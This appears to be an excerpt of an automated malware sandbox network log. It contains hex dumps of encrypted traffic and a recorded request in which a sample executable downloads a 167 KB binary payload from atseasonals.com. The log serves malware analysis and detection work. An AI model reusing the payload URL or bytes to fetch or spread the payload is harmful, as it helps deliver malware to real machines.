                                                                                                                        2021-11-25 11:54:54 UTC31INData Raw: 10 24 e9 36 49 4b 33 3f ba 8b 32 30 9e 48 46 3e 28 e7 ce c7 f9 03 d0 c0 2b f2 4b 41 2c 3a 96 8e 46 0d 63 2d d7 0b 4e d7 ba ef b6 ec 68 3b e0 4e de 91 bd dc 1b d2 04 7c c0 14 44 a9 bf 32 ea 46 fa 70 92 bb e4 c5 95 17 c9 a0 2b 0a 81 c4 0d 82 88 14 16 3b 92 db 30 c5 f8 f6 f5 b3 c6 8c ba b6 c4 91 6a 02 82 a5 9b 20 f9 72 f0 00 6f 46 3d 6c 9b f0 19 de 6a 19 23 92 bb 0b fb 12 49 d8 d1 4e 31 fa ca 64 ef 07 91 de 08 9e f0 1b c4 57 59 a7 89 e0 ea d6 40 3c d5 1e d7 ea 6e c0 f1 67 de c3 ef c4 80 61 ac 13 a5 fa 22 90 53 e0 43 11 ec c3 e9 c4 f0 78 10 cd eb 15 6c 89 de e4 fe da 0c 85 a1 7c e1 ec 18 42 b4 26 ea ea 93 ec 02 99 62 cb 42 0d b1 ce c6 06 10 35 4b 6b dc 91 88 92 c5 92 42 60 e4 07 80 b6 f6 b7 dc 88 2f 35 f3 c9 a7 ca 6e 25 6b 6f 92 8c 5a ac 9d 81 6f 70 42 41 83
                                                                                                                        Data Ascii: $6IK3?20HF>(+KA,:Fc-Nh;N|D2Fp+;0j roF=lj#IN1dWY@<nga"SCxl|B&bB5KkB`/5n%koZopBA
                                                                                                                        2021-11-25 11:54:54 UTC39INData Raw: 8c e2 92 21 9f f8 12 80 71 84 bb 0d 80 91 03 cc 26 88 73 33 ec 1a dd b9 91 14 4c 37 25 ba 25 7e ef 29 a1 28 6c c5 3d bb 07 44 cd e3 18 34 78 b9 e8 f0 f3 88 4f d4 cb 68 a4 fc 81 7b 7d 01 17 38 a3 f9 03 2f 47 85 af 26 e8 15 78 e9 d3 8a 28 94 95 0c e9 77 8b c1 d0 0f 3b 94 07 9b 6d 7a 2e ca fa ce 04 90 40 1e 60 b7 42 32 d7 88 60 d7 01 4c a0 5e cd 95 16 83 c1 e5 19 71 d4 ff ef b3 dc a3 40 aa 69 a1 87 79 10 75 a2 d9 c6 08 60 bc 69 b4 13 01 ef 9c b6 75 ea 17 ed 29 9a 03 a0 d6 eb b7 a5 0c 5a 64 5c a2 2b d3 cf 9f 5c 5e ac 0a d6 34 49 a4 4a a2 c7 83 ee 75 86 ae c1 67 cf 6f ca 3f 0e 9e b0 f9 e3 f9 e7 7f b7 97 3e 5b 8a a2 bb 41 14 53 f6 90 07 8e 60 df 0a f8 18 77 4c 6a 8f 8b 69 1f c7 08 6d cc 53 12 bf 2b b1 e2 4a c4 a6 d7 50 59 f2 5d 9c 2a 68 71 21 fd da 71 20 5c 63
                                                                                                                        Data Ascii: !q&s3L7%%~)(l=D4xOh{}8/G&x(w;mz.@`B2`L^q@iyu`iu)Zd\+\^4IJugo?>[AS`wLjimS+JPY]*hq!q \c
                                                                                                                        2021-11-25 11:54:54 UTC47INData Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82
                                                                                                                        Data Ascii: wt*KXeKKz'*f"WoIN\/8I^7<q,p&@]$eC4S@`~:;*`/?BXX<2tUnLnuh*JcHV?FK\*}{`r[Y57e!>A(C+1=!}E.13"Q=*}6&a9=_/
                                                                                                                        2021-11-25 11:54:54 UTC55INData Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75
                                                                                                                        Data Ascii: DWe#"HYD?Zu[Wj-rBuO+|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T|Jq7IGu
                                                                                                                        2021-11-25 11:54:54 UTC62INData Raw: c0 96 49 cd 9d e3 59 af 89 f3 bf ba ca 96 50 ca eb d6 6b 0f df e2 39 a1 bb e1 71 2e dc 70 7c b3 fe b1 3d 5a dc 17 19 2b c5 8d eb ec 96 69 78 a3 1f 61 30 c4 3d f9 58 2a 3d 95 1a 3b 1d 02 8e c8 9c 35 3b 7e 33 01 91 2c 2a 2a e7 1e 0f cd 58 3e c2 7d c3 1e be 57 d0 1f 43 a8 e9 b1 e1 65 65 8f aa 09 4a 95 40 0a 95 59 2c 47 21 76 34 1d 92 67 77 b4 2e 95 22 53 5b 16 a9 33 38 85 97 9e ad c7 bd cf 33 ae fe 8a e3 4d 65 3b a0 e3 f1 b3 28 45 95 ae 00 8d 57 13 4d a2 aa e7 81 51 61 d0 3a 4f 10 b9 23 68 07 29 52 ac 1b 34 1a 61 05 ca c5 07 d4 3b 5c 3e 99 97 0f cd 2b b8 2b 47 dc 01 59 73 a3 f9 e5 7c 3f 1b 4f 39 e3 d8 ea e1 2b 3d 52 83 f5 59 f7 1d 9b 93 18 ea 77 43 8c 82 0e dd 90 bb 77 55 02 41 de 8a 0f f8 0c 72 5a 48 d7 a8 76 d4 12 f4 7a 30 0e 5a 2a c4 bb ed d6 7e f9 92 16
                                                                                                                        Data Ascii: IYPk9q.p|=Z+ixa0=X*=;5;~3,**X>}WCeeJ@Y,G!v4gw."S[383Me;(EWMQa:O#h)R4a;\>++GYs|?O9+=RYwCwUArZHvz0Z*~
                                                                                                                        2021-11-25 11:54:54 UTC70INData Raw: d9 61 6f 9a c0 da 28 6c 0e 3e cf 1c 0f cd c0 4e 75 e2 54 1f 7d 92 f6 a6 e5 a7 f5 96 5f 8a 39 27 ba 8a b0 99 c5 e0 6f f7 4e fa 16 01 e5 46 de 9b 99 66 19 1e 4a 44 f4 f9 58 fd a9 f2 38 3b 90 ca df 9e bb d7 ce 69 bc 3d fb dc 3c 66 a3 83 fc 36 c4 d7 df 90 46 f9 ed 98 c1 19 e5 92 ef 07 e3 d5 a0 c6 9e 0c 9f a1 f3 01 b6 26 8a dc 6e 40 af d8 f1 6a f2 6f 49 47 4d 9a 61 a8 50 68 a6 5e 83 b1 ea 10 ba 8f 83 79 f0 48 37 81 5d 3a 2c d7 d3 4f 62 6f 86 cc 10 4b 6b e4 46 6a 3c 85 6d 30 1a 8a fd 2e c0 e1 22 97 b9 91 35 f3 67 4f ee e9 a3 6b ec db 09 97 c6 d6 80 fa 8d 42 c3 7f 55 eb 49 b2 62 a0 8f 86 06 be 98 42 d4 c3 6b 57 f3 bf 35 86 89 96 57 6c 93 e6 c5 a6 da 7e 9a b0 78 d2 8b 73 11 59 e1 4d 0a 08 6f 0b ad 00 15 c0 e5 05 92 b6 f2 45 9f 32 67 c6 e4 ff 73 cb 17 f0 19 02 7d
                                                                                                                        Data Ascii: ao(l>NuT}_9'oNFfJDX8;i=<f6F&n@joIGMaPh^yH7]:,OboKkFj<m0."5gOkBUIbBkW5Wl~xsYMoE2gs}
                                                                                                                        2021-11-25 11:54:54 UTC78INData Raw: 9f 4f 06 44 ed 3a 67 59 cc 84 6b 7b 2d c1 d9 f8 20 b1 c6 eb c2 28 b5 b6 fb a1 11 3e 80 aa 47 c1 50 98 fd bc ce de 3a 95 60 64 17 67 4e eb 32 49 be b4 0c d6 ba f8 9e 04 71 98 1b 82 3e 4a 26 25 b9 37 fd 1b 7c cf 67 ba 33 36 67 d4 00 9a 55 17 45 a0 fa bd 7e 1f f2 d7 03 23 43 a8 de 65 00 d3 08 03 ac 26 b0 2c 8c 9f 1e c0 da e5 37 2a 35 8f e7 cb 8b 47 8d 80 aa 84 3c 1a d1 1c 19 3b 59 32 00 ee a6 ee 0b 4e c7 d6 f8 60 ad b4 4e 79 42 75 54 88 f2 ab de 03 1b 96 83 4b 6a df 54 a9 aa 6e b0 e1 59 b2 15 34 66 e8 e4 10 64 a7 08 47 f3 f3 61 15 2e 78 ed a5 b0 da 42 62 c8 f5 ec fc 71 c6 15 d3 b6 70 90 fc de b0 d8 4c 15 cb a1 22 0d 1e 81 48 b6 16 0c 62 9e ee 76 33 fb 7a 62 30 2c a9 7a 45 06 87 0c 22 52 7a 0a 6c 7d d4 5c 7b 06 25 f8 e3 42 5f 87 a5 38 68 74 4a 91 e5 5e e3 9d
                                                                                                                        Data Ascii: OD:gYk{- (>GP:`dgN2Iq>J&%7|g36gUE~#Ce&,7*5G<;Y2N`NyBuTKjTnY4fdGa.xBbqpL"Hbv3zb0,zE"Rzl}\{%B_8htJ^
                                                                                                                        2021-11-25 11:54:54 UTC86INData Raw: bf 18 09 42 e2 32 a7 0c 30 08 90 55 a3 2b b9 b8 84 1b 45 41 c0 82 0d f4 a3 b8 a8 a1 ae bf 2b 47 44 a8 2c 5b 84 87 82 7f c9 9b 6b 1f 6d 0d b8 2e 97 55 5e a3 b2 0e 82 ab fc 9e 64 d2 e3 db 86 9e 55 b0 a9 d1 f2 bb 97 b6 96 fa 25 c7 54 b7 c9 14 13 bd 1a af 9d 05 6a aa a7 80 ec cb a8 16 a0 38 10 e8 a8 69 ce d4 d1 a9 3f 51 0b 5a 61 f5 31 26 f6 f7 f7 5b 80 8e be bc fb 2f 27 9a 5b da 49 41 39 43 cd ac 92 7a 02 0f 2b d8 c9 56 b9 b8 cf 20 50 fb 06 c6 18 70 c4 62 b4 de 90 85 2b 5f e3 7d e5 8a 74 3e 54 ff 48 54 54 be b8 3b 55 e8 b3 16 07 4a 4b ff 86 83 6a 3d 2b c7 d1 3a ff 68 e3 f2 7c ee 76 ae 25 a6 a4 93 50 16 ff 63 44 28 38 44 cb 23 44 7e be 0e 8c a1 9e 33 02 54 7b ba 5d 74 3d 0e c7 eb 9c 51 cc db 9e 55 ea f2 fa 73 c5 2e 92 50 b4 6c 89 16 c5 98 1b 85 5a 11 b1 98 fc
                                                                                                                        Data Ascii: B20U+EA+GD,[km.U^dU%Tj8i?QZa1&[/'[IA9Cz+V Ppb+_}t>THTT;UJKj=+:h|v%PcD(8D#D~3T{]t=QUs.PlZ
                                                                                                                        2021-11-25 11:54:54 UTC94INData Raw: 5d 34 b0 7b e5 91 6f 0b 13 20 17 da 67 57 a0 87 bf 95 4b 66 08 4b b8 f4 c4 76 99 4f 85 62 02 7e 7d c1 73 21 d0 bf 49 0d d8 7a 64 07 5f 4f ce 97 0a dc 94 26 24 cc a7 4c 6b 2f f2 7e d5 0d 1a 2d 1f 6b 5e d1 6c 73 4e 35 71 98 45 e0 30 a7 b3 8d e3 5d 52 d7 4c df 66 ca 50 e6 9e f9 db cb 67 4b 61 1b 57 48 5b 67 11 3f fc 47 11 41 a9 1b 47 a7 b8 c5 bd 5d 66 f8 13 45 90 28 7e 19 90 4b 33 56 49 07 39 04 76 b3 75 01 cd 93 5b ed 1d e3 5a db 2b d2 ec 35 77 76 79 03 df f5 d3 92 6d 4f 01 fe 86 4d 0b 07 3e 66 8d d9 0e c0 9b 7e cd be c2 80 5c 5e d5 b2 e2 15 84 2d 45 89 c4 ba e9 61 08 90 3f fe fe 22 7e ec 44 62 1b 5a 49 79 0a e9 f7 34 42 40 f0 a0 0a 7b 2a fd 43 2e b3 1f cf 90 f7 b9 c5 01 85 38 a2 62 bc 74 89 5f c5 3a 50 99 72 7b 4a 7a e7 4f 3e 3f 4f 01 07 17 8f 87 bb 3b 67
                                                                                                                        Data Ascii: ]4{o gWKfKvOb~}s!Izd_O&$Lk/~-k^lsN5qE0]RLfPgKaWH[g?GAG]fE(~K3VI9vu[Z+5wvymOM>f~\^-Ea?"~DbZIy4B@{*C.8bt_:Pr{JzO>?O;g
                                                                                                                        2021-11-25 11:54:54 UTC101INData Raw: 18 ba d6 5f 31 8a 16 79 cd 91 4e f2 19 c0 f5 c6 18 df fe 49 41 a4 f9 01 01 c3 25 55 8b 7b b0 39 2d 43 7e f3 c0 eb 7a 5c d6 bc fe 7c 4e d0 ba 11 1e a4 17 b2 32 49 ce c7 7a 4e 8d b9 60 b8 33 b8 6d 1a 1d 83 d0 d2 a9 67 fc d6 70 ec 9d f4 a6 bd 6e 42 bd d6 80 76 ef df da 0d c8 05 47 ad b3 dd 5f 07 09 ba 73 79 96 b3 61 05 11 76 d1 62 e7 5f 5d 42 68 6b 6c b0 7c 3b c2 95 30 81 73 b3 09 38 ae 72 9e b7 c4 97 c2 e7 ca 91 83 30 b2 cf da aa 1b fa 3a 81 b4 90 12 de 6a 7a 66 5f cd b1 6d 9d 5a a9 e4 12 33 71 2f d1 0b 58 c2 41 59 a7 9f ae 57 ba da c6 cc be ec e5 b7 ad 90 16 3f 23 18 f1 78 a1 e6 64 42 92 13 28 a0 11 10 8f b0 25 fd b6 ab df 1c b7 53 bf bf 30 99 84 a1 6d 4f f4 d6 6f 06 a3 69 83 2a ac 32 1f 4d b2 91 8a a4 51 6c 98 d7 6d 3d 14 3f df 56 31 39 ed d0 3c ce ab fb
                                                                                                                        Data Ascii: _1yNIA%U{9-C~z\|N2IzN`3mgpnBvG_syavb_]Bhkl|;0s8r0:jzf_mZ3q/XAYW?#xdB(%S0mOoi*2MQlm=?V19<
                                                                                                                        2021-11-25 11:54:54 UTC109INData Raw: 6f 5d 45 95 9d 3b a9 46 1e a9 07 f0 80 ff 1a c7 4e 4d 60 f6 d3 24 ac 27 97 eb 78 e5 e4 a6 88 9b a3 fe 0a 74 0e 32 12 df 1c 3c 25 9c 0d 2f 91 02 62 3f c4 89 de 67 b4 4f 61 d8 7a 83 b1 61 55 39 e2 4b e9 6d 26 98 ce 55 e1 11 d3 32 0a 3d 68 6d c2 66 1b 83 d9 97 18 4e 47 56 c3 60 20 88 38 c2 f3 2e dc 30 4a 41 70 12 57 8b 03 ae 63 67 16 90 d4 ff a2 0a 98 d8 40 7d 17 e4 00 b6 c0 64 24 7c a8 16 dd 07 f1 21 cb 98 d6 27 39 3d a7 ec d0 07 2c eb ec 90 aa 8a 15 2e 68 5a 7f f1 9d 84 a6 31 df ee 0b 8b 7e be e3 e4 18 74 97 3f a2 a3 1d c8 16 63 da a7 49 8b 0a 4a 33 fa ff eb 53 3a 00 88 5f 82 e3 3f 29 fa c7 ef 47 6c 78 5b e4 49 ea 16 1c 84 e2 89 05 a2 3e 18 1a ef 81 a1 0f 5d 66 05 cd 9e e9 a7 39 c4 3a 1c be 6a b9 84 90 82 b3 2e 12 4f 3a 26 41 41 75 54 5d 38 69 c3 3e 92 18
                                                                                                                        Data Ascii: o]E;FNM`$'xt2<%/b?gOazaU9Km&U2=hmfNGV` 8.0JApWcg@}d$|!'9=,.hZ1~t?cIJ3S:_?)Glx[I>]f9:j.O:&AAuT]8i>
                                                                                                                        2021-11-25 11:54:54 UTC117INData Raw: d7 10 b6 98 45 cc 3c 2d e9 70 9f 88 67 fe 72 93 45 00 1d c6 9b 03 23 12 a3 77 0d e2 5b ea 8b 15 f5 ba d5 3d 5c f6 4b d5 b4 61 9a 8b a9 6f 43 88 8a 8c 8b 8c 4b 9c 87 62 97 fc 66 9a e9 3a 8b 21 e2 b2 c7 2e 5d 99 66 5c 78 22 51 43 75 54 53 c8 c8 23 b0 18 90 8e c2 88 20 f9 e7 07 96 e0 6a df 0a d1 5c ee 31 e7 97 dd 65 b8 ea 5e 61 df 9c 7b 80 05 9b 3e b2 ca 61 57 2f 53 80 be 77 ea 10 dd b4 a0 a3 80 50 1a 24 9d 43 72 21 01 d4 a0 34 b0 c1 91 5d 15 60 7e 61 38 93 3d 97 2b db fc 55 54 d7 87 a4 0e b3 e3 73 cf 7b 28 b7 bd 77 aa b1 13 51 ac eb fd e0 fc 49 6f 15 ea 97 ba 9c b5 d5 66 5f 48 f4 93 02 76 00 bb 3f 08 2e 5c 21 56 17 23 56 e8 85 35 1c 3e 28 88 72 c7 3d d0 6d b3 23 00 73 36 17 c0 c9 fa c1 1f 5d 25 47 a2 a7 7e 30 58 b7 d5 2f 03 de 2c 4b 05 5d 85 a9 b9 63 36 fb
                                                                                                                        Data Ascii: E<-pgrE#w[=\KaoCKbf:!.]f\x"QCuTS# j\1e^a{>aW/SwP$Cr!4]`~a8=+UTs{(wQIof_Hv?.\!V#V5>(r=m#s6]%G~0X/,K]c6
                                                                                                                        2021-11-25 11:54:54 UTC125INData Raw: 77 d8 7b 6b 2a 25 48 05 38 5e 9d dc f4 d5 3c 5d e0 6e e4 c8 68 e7 36 a5 16 5a 57 9b 93 9c 0c 60 78 8c 64 f7 4c 19 9e c8 33 5e 88 6e cf 74 36 3e 04 4f 09 ea ed c5 a0 59 b6 9e df dd 6e 38 70 0d 5c e9 b5 4b 39 d8 0d a4 54 49 21 d1 5c 77 d0 6c a6 50 75 c9 e3 e0 58 c7 6a 53 79 02 74 05 5a ae 8a d6 83 0c 58 7a 6f c3 4a 54 b1 aa 7c 6a 0f 22 66 7e da 93 a1 94 3f 56 58 62 52 0b 69 bb 7a 3d fe bf a3 32 07 83 f0 9d b1 c9 a2 64 07 f7 ea 9b 79 6d d3 30 72 a2 49 17 2d e3 35 af 55 f3 b4 aa e4 70 ed 05 8c f2 a5 de b7 08 77 56 fa 52 c8 9d d8 10 54 46 9e ec 20 66 3a a1 4b 55 3f 11 a6 fd ca f1 2c cc a6 18 1b b6 02 21 ec f3 55 2b 67 16 d5 86 01 3b 2b 8a 92 86 c5 87 df 33 ce 8f 80 ef cf dd 67 9a 1c b9 12 3e cb a2 d2 53 e6 59 a9 4a 31 bf 19 18 a0 d3 d9 df 5e d1 42 b2 1e f3 e0
                                                                                                                        Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
                                                                                                                        2021-11-25 11:54:54 UTC133INData Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a
                                                                                                                        Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
                                                                                                                        2021-11-25 11:54:54 UTC140INData Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb
                                                                                                                        Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
                                                                                                                        2021-11-25 11:54:54 UTC148INData Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30
                                                                                                                        Data Ascii: }|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
                                                                                                                        2021-11-25 11:54:54 UTC156INData Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4
                                                                                                                        Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.11.2049837107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-11-25 12:01:12 UTC163OUTGET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: atseasonals.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2021-11-25 12:01:12 UTC164INHTTP/1.1 200 OK
                                                                                                                        Date: Thu, 25 Nov 2021 12:01:12 GMT
                                                                                                                        Server: Apache
                                                                                                                        Last-Modified: Wed, 24 Nov 2021 12:20:38 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 167488
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        2021-11-25 12:01:12 UTC164INData Raw: 70 99 d0 d2 81 fc a4 8c 6e ba 05 d0 4f 67 65 7f 4e 1e 4a f3 03 49 ab 4d f8 3b 67 96 a3 b5 f7 07 46 d9 a0 8b 7f 32 0c 43 a2 5a 42 b2 12 de b0 f4 94 d3 dc 46 6c cf 8e 15 59 63 2a 6b 99 39 71 c3 a8 94 6c 4a 84 13 81 5d 6a 1e 54 51 46 ba f1 ed d4 08 c0 6b 8d b8 64 71 ec 91 c7 1a 01 6d 7f 49 a6 3a 51 3c d1 ca 0c 98 4f 06 47 24 6b ec 56 9c d7 39 29 7f 90 8f 10 2b ff c6 eb 49 87 e7 e0 70 77 e6 54 c0 aa f3 4b 59 89 c0 66 fa 8f 90 47 e4 0a 64 47 b5 d4 b5 71 92 58 65 b7 82 12 15 37 dd 6f c2 ec 2e 2b df 1d cf 2c 5e 7a d8 f2 d7 16 ec 09 81 e5 9d 39 0d e2 1d d4 71 ba ff de 2e 9b 03 5e 74 c4 af 5c 6d 82 2a 3a fb 21 10 13 c5 ce 56 69 4f 4e 29 b7 4f 90 af e9 9a cd 2d 39 69 e5 2b 66 10 5b b4 5e 9d e0 b1 b1 c0 09 52 76 c0 87 33 99 a3 bb ca 51 43 75 54 5b 4e a0 ab 74 91 19
                                                                                                                        Data Ascii: pnOgeNJIM;gF2CZBFlYc*k9qlJ]jTQFkdqmI:Q<OG$kV9)+IpwTKYfGdGqXe7o.+,^z9q.^t\m*:!ViON)O-9i+f[^Rv3QCuT[Nt
                                                                                                                        2021-11-25 12:01:12 UTC172INData Raw: 8e bc 4e ec 48 d6 a2 16 02 23 e6 e8 1f c6 a2 f1 87 bf bc dc f2 e5 1d 71 93 43 e5 f8 66 89 73 ea 07 49 9d 46 cf 62 29 04 b0 e9 ff 10 16 06 87 4d 38 5b 62 65 fc dc 00 f5 ba 79 ad 56 32 fd 03 8f fb 4b a3 5d d9 ce 81 4a 9e 3d 17 f4 d2 a1 c7 87 3d fd 91 4b 9a 13 dd 39 3b e3 c6 4f 06 1c 79 d3 83 26 00 53 1b 67 5c 44 5b d7 c5 62 93 8e 6f 5e 54 c7 c8 d9 a6 d5 ad 5a 6e da 10 69 c7 77 c2 68 d5 b1 0a 47 90 e0 8d 6a c4 32 66 27 47 62 84 7f 3d 22 1c 03 85 6c ab 59 45 eb 4f 70 ed 38 f2 31 d8 5d 7f f7 6a d4 8d e0 3d 2c 94 bd bd 34 7c 13 68 7f d2 e5 fe c7 04 85 50 1c bd f6 f8 38 d0 29 78 5b 26 a9 d3 c5 eb 01 5f 8a aa 88 23 3f 9d 0e a8 06 f9 96 8b 3e 21 23 9c 5b 82 da cd 2b 99 a0 fe 37 cb c6 17 31 d1 3e 34 39 7e 3f 48 2b bc 10 99 e2 7e 1d 53 6c e7 67 00 b8 4c cb 8f 35 3c
